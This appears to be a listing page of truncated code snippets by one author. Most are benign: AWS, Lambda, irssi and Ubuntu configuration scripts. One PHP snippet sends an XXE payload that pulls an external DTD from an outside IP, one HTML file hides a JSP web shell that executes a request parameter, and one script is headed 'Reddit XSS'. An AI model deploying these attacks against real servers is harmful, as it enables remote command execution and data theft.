sh1n0b1

# Ensure jq 1.5 or greater is installed on your linux system
# ex. apt-get install jq or https://stackoverflow.com/questions/36462955/upgrading-jq-to-1-5-on-ubuntu?answertab=votes#tab-top
#
# If you have a single port/password config like the following:
# {
#   "server":"my_server_ip",
#    "server_port":8388,
#    "local_address": "127.0.0.1",
#    "local_port":1080,
#    "password":"mypassword",

sh1n0b1

import urllib, json
import requests # 'pip install requests'
from boto.sts import STSConnection # AWS SDK for Python (Boto) 'pip install boto'

# Step 1: Authenticate user in your own identity system.

# Step 2: Using the access keys for an IAM user in your AWS account,
# call "AssumeRole" to get temporary access keys for the federated user

# Note: Calls to AWS STS AssumeRole must be signed using the access key ID 

sh1n0b1

import subprocess, json
def lambda_handler(event, context):
    command = ['python','HashTag.py', '-sh', event['pathParameters']['hash']]
    process = subprocess.Popen(command, shell=False, stdout=subprocess.PIPE)
    message = process.stdout.read()
    response = {
        "isBase64Encoded": False,
        "statusCode": 200,
        "headers": {},
        "body": message

sh1n0b1

#!/usr/bin/env python
#Reddit XSS
#Author: Cheetz
import urllib2, sys
import logging, os, re, sys, urllib, string
from optparse import OptionParser
from urlparse import urlparse

class Lookup:
        def run(self,url):

sh1n0b1

<?php

$xml_data ='<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE roottage [
<!ENTITY % dtd SYSTEM "http://<IP_ADDRESS>">
%dtd;]>';
//<!ENTITY xxe SYSTEM "http://target/">]>
$URL = "https://target/";
$ch = curl_init($URL);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: text/html'));

sh1n0b1

$ brew install irssi gmp
$ cpan install Crypt::OpenSSL::Bignum Crypt::Blowfish Crypt::DH::GMP
$ echo '[[ $SHLVL -eq 1 ]] && eval "$(perl -I$HOME/perl5/lib/perl5 -Mlocal::lib)"' >> ~/.bashrc
$ mkdir -p ~/.irssi/scripts/autorun
$ (cd ~/.irssi/scripts/; wget https://scripts.irssi.org/scripts/cap_sasl.pl; ln -s ../cap_sasl.pl autorun/)
$ irssi
  /sasl set <network> <nick> <password> DH-BLOWFISH
  /sasl save

sh1n0b1

#!/bin/python3
from base64 import b64encode
from os import urandom

random_bytes = urandom(64)
token = b64encode(random_bytes).decode('utf-8')
print(token)

sh1n0b1

#!/usr/bin/python

import sys
import hashlib
from OpenSSL.crypto import *

def main():
  if(len(sys.argv) != 4):
    print sys.argv[0] + " /path/to/ssl.crt /path/to/ssl.key ProcessedMachineIdentifier"
    sys.exit(0)

sh1n0b1

<html>
<head>
<!-- <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<br />"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null )
{ out.println(disr); disr = dis.readLine(); } } %> 
-->
</head>
<body>
</body>
</html>

sh1n0b1

# Figure out the version of Ubuntu that you're running
V=`/usr/bin/lsb_release -rs`
 
# The privacy problems started with 12.10, so earlier versions should do nothing
if [ $V \< 12.10 ]; then
  echo "Good news! Your version of Ubuntu doesn't invade your privacy."
else
  # Turn off "Remote Search", so search terms in Dash don't get sent to the internet
  gsettings set com.canonical.Unity.Lenses remote-content-search none